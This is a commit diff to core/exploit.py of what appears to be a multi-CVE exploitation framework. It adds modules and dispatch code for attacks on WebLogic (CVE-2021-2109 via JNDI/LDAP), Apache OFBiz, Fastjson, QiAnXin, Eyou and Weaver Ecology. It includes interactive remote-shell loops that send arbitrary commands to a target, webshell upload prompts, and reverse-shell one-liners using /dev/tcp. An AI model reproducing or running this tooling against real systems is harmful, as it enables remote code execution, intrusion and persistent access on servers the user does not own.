update 0.8

core/exploit.py

@@ -27,6 +27,9 @@ from payload.SaltStack import SaltStack
 from payload.Exchange import Exchange
 from payload.F5_BIG_IP import BIG_IP
 from payload.ApacheOFBiz import ApacheOFBiz
+from payload.QiAnXin import QiAnXin
+from payload.Eyou import Eyou
+from payload.Ecology import Ecology
 
 
 explists = ("CVE-2017-12629", "CVE-2019-17558", "S2-005", "S2-008", "S2-009", "S2-013", "S2-015", "S2-016", "S2-029",
@@ -42,10 +45,13 @@ explists = ("CVE-2017-12629", "CVE-2019-17558", "S2-005", "S2-008", "S2-009", "S
             "cve-2018-7602", "cve-2019-6340", "cve-2018-1000861", "cve-2019-7238", "cve-2020-10199", "cve-2017-3506",
             "cve-2017-10271", "cve-2018-2894", "cve-2019-2725", "cve-2019-2729", "cve-2020-2555", "cve-2020-2883",
             "cve-2020-14882", "cve-2010-0738", "cve-2010-1428", "cve-2015-7501", "cve-2018-20062", "cve-2019-9082",
-            "cve-2020-13942", "cve-2020-17519", "cve-2019-3799", "cve-2020-5410", "1.2.24", "1.2.47", "1.2.62",
+            "cve-2020-13942", "cve-2020-17519", "cve-2019-3799", "cve-2020-5410", "VER-1224-2", "VER-1224-1", "VER-1247",
+            "VER-1262", "ver-1224-2", "ver-1224-1", "ver-1247", "ver-1262", "ver-1224-3", "VER-1224-3",
             "CVE-2021-25646", "cve-2021-25646", "CVE-2018-15133", "cve-2018-15133", "CVE-2021-21972", "cve-2021-21972",
             "CVE-2021-25282", "cve-2021-25282", "CVE-2021-27065", "cve-2021-27065", "CVE-2021-22986", "cve-2021-22986",
-            "CVE-2020-5902", "cve-2020-5902", "CVE-2021-26295", "cve-2021-26295")
+            "CVE-2020-5902", "cve-2020-5902", "CVE-2021-26295", "cve-2021-26295", "time-2021-0410", "CVE-2021-2109",
+            "cve-2021-2109", "cnvd-2021-26422", "CNVD-2021-26422", "CVE-2021-30128", "cve-2021-30128", "time-2021-0515",
+            "TIME-202-0515")
 
 
 def exploit(target, vul_num):
@@ -76,6 +82,9 @@ def exploit(target, vul_num):
     exp_exchange = Exchange(target)
     exp_big_ip = BIG_IP(target)
     exp_apache_ofbiz = ApacheOFBiz(target)
+    exp_qianxin = QiAnXin(target)
+    exp_eyou = Eyou(target)
+    exp_ecology = Ecology(target)
     print(now.timed(de=delay) + color.yel_info() + color.cyan(" Target url: " + target))
     print(now.timed(de=delay) + color.yel_info() + color.cyan(" Use exploit modules: " + vul_num))
     nc = now.timed(de=0) + color.yel_info() + color.yellow(" input \"nc\" bounce linux shell")
@@ -83,6 +92,7 @@ def exploit(target, vul_num):
     rmi_ldap = now.timed(de=0) + color.yel_info() + color.yellow(" RMI/LDAP Server:(e.g. ldap://192.168.0.1/Exploit)")
     bash = now.timed(de=0) + color.yel_info() + color.yellow(" nc shell: \"bash -i >&/dev/tcp/127.0.0.1/9999 0>&1\"")
     bash_2 = now.timed(de=0) + color.yel_info() + color.yellow(" nc shell: \"/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/127.0.0.1/8888 0>&1\"")
+    jndi = now.timed(de=0) + color.yel_info() + color.yellow(" Reference https://github.com/feihong-cs/JNDIExploit")
     cmd = "whoami"  # 为了消除pycharm错误提示，没啥用
     file = "/etc/passwd"  # 为了消除pycharm错误提示，没啥用
     path = "/tmp/test"  # 为了消除pycharm错误提示，没啥用
@@ -204,7 +214,7 @@ def exploit(target, vul_num):
             path = input(now.timed(de=delay) + color.green("[+] upload path (e.g. /tmp/test.txt): "))
         elif os_check() == "windows":
             file = input(now.no_color_timed(de=delay) + "[+] upload file: ")
-            path = input(now.timed(de=delay) + color.green("[+] upload path (e.g. /tmp/test.txt): "))
+            path = input(now.no_color_timed(de=delay) + "[+] upload path (e.g. /tmp/test.txt): ")
         while True:
             if os_check() == "linux" or os_check() == "other":
                 cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> "))
@@ -218,7 +228,7 @@ def exploit(target, vul_num):
             email = input(now.timed(de=delay) + color.green("[+] email: "))
             file = input(now.timed(de=delay) + color.green("[+] webshell name (e.g. shell.aspx): "))
         elif os_check() == "windows":
-            email = input(now.timed(de=delay) + color.green("[+] email: "))
+            email = input(now.timed(de=delay) + "[+] email: ")
             file = input(now.no_color_timed(de=delay) + "[+] uwebshell name (e.g. shell.aspx: ")
         while True:
             if os_check() == "linux" or os_check() == "other":
@@ -228,6 +238,20 @@ def exploit(target, vul_num):
             if cmd == "exit" or cmd == "quit" or cmd == "bye":
                 sys.exit(0)
             exp_exchange.cve_2021_27065_exp(cmd, file, email)
+    elif vul_num == "CVE-2021-2109" or vul_num == "cve-2021-2109":
+        print(jndi)
+        if os_check() == "linux" or os_check() == "other":
+            ldap = input(now.timed(de=delay) + color.green("[+] ldap (e.g. ldap://127.0.0.1:1389/Basic/WeblogicEcho ): "))
+        elif os_check() == "windows":
+            ldap = input(now.no_color_timed(de=delay) + color.green("[+] ldap (e.g. ldap://127.0.0.1:1389/Basic/WeblogicEcho ): "))
+        while True:
+            if os_check() == "linux" or os_check() == "other":
+                cmd = input(now.timed(de=delay) + "[+] Shell >>> ")
+            elif os_check() == "windows":
+                cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
+            if cmd == "exit" or cmd == "quit" or cmd == "bye":
+                sys.exit(0)
+            exp_oracle_weblogic.cve_2021_2109_exp(ldap, cmd)
 
     # 远程命令执行漏洞单独简单运行
     else:
@@ -328,21 +352,23 @@ def exploit(target, vul_num):
             elif vul_num == "S2-devMode" or vul_num == "s2-devmode":
                 exp_apache_struts2.s2_devMode_exp(cmd)
 
-            elif vul_num == "1.2.24":
+            elif vul_num == "VER-1224-1" or vul_num == "ver-1224-1":
                 print(rmi_ldap)
-                exp_fastjson.fastjson_1224_exp(cmd)
-            elif vul_num == "1.2.47":
+                exp_fastjson.fastjson_1224_1_exp(cmd)
+            elif vul_num == "VER-1224-2" or vul_num == "ver-1224-2":
+                exp_fastjson.fastjson_1224_2_exp(cmd)
+            elif vul_num == "VER-1224-3" or vul_num == "ver-1224-3":
+                exp_fastjson.fastjson_1224_3_exp(cmd)
+            elif vul_num == "VER-1247" or vul_num == "ver-1247":
                 print(rmi_ldap)
                 exp_fastjson.fastjson_1247_exp(cmd)
-            elif vul_num == "1.2.62":
+            elif vul_num == "VER-1262" or vul_num == "ver-1262":
                 print(rmi_ldap)
                 exp_fastjson.fastjson_1262_exp(cmd)
-
-            elif vul_num == "CVE-2021-25646":
+            elif vul_num == "CVE-2021-25646" or vul_num == "cve-2021-25646":
                 print(bash_2)
                 exp_apache_druid.cve_2021_25646_exp(cmd)
-
-            elif vul_num == "CVE-2021-22986":
+            elif vul_num == "CVE-2021-22986" or vul_num == "cve-2021-22986":
                 exp_big_ip.cve_2021_22986_exp(cmd)
             elif vul_num == "CVE-2020-5902" or vul_num == "cve-2020-5902":
                 print(now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd"))
@@ -350,5 +376,15 @@ def exploit(target, vul_num):
             elif vul_num == "CVE-2021-26295" or vul_num == "cve-2021-26295":
                 print(now.timed(de=delay) + color.yel_info() + color.yellow(" java encode: http://www.jackson-t.ca/runtime-exec-payloads.html"))
                 exp_apache_ofbiz.cve_2021_26295_exp(cmd)
+            elif vul_num == "CVE-2021-30128" or vul_num == "cve-2021-30128":
+                print(now.timed(de=delay) + color.yel_info() + color.yellow(" java encode: http://www.jackson-t.ca/runtime-exec-payloads.html"))
+                exp_apache_ofbiz.cve_2021_30128_exp(cmd)
+            elif vul_num == "time-2021-0410" or vul_num == "TIME-2021-0410":
+                exp_qianxin.time_2021_0410_exp(cmd)
+            elif vul_num == "CNVD-2021-26422" or vul_num == "cnvd-2021-26422":
+                exp_eyou.cnvd_2021_26422_exp(cmd)
+            elif vul_num == "time-2021-0515" or vul_num == "TIME-2021-0515":
+                exp_ecology.time_2021_0515_exp(cmd)
+
             else:
                 pass